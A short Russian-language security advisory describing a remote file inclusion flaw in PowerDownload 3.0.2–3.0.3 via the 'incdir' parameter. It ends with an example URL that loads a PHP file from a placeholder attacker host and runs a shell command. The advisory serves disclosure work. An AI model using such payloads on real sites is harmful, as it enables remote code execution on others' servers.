Программа: PowerDownload 3.0.2, 3.0.3
Уязвимость позволяет удаленному
пользователю выполнить произвольные
команды на целевой системе. Уязвимость
существует из-за недостаточной проверки
входных данных в переменной 'incdir' сценария 'pdl-inc/pdl_header.inc.php'.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный php файл.
Пример:
http://[target]/download/downloads.php?release_id= 650&incdir=http://[attacke]/cmd.gif?&cmd=uname%20-a
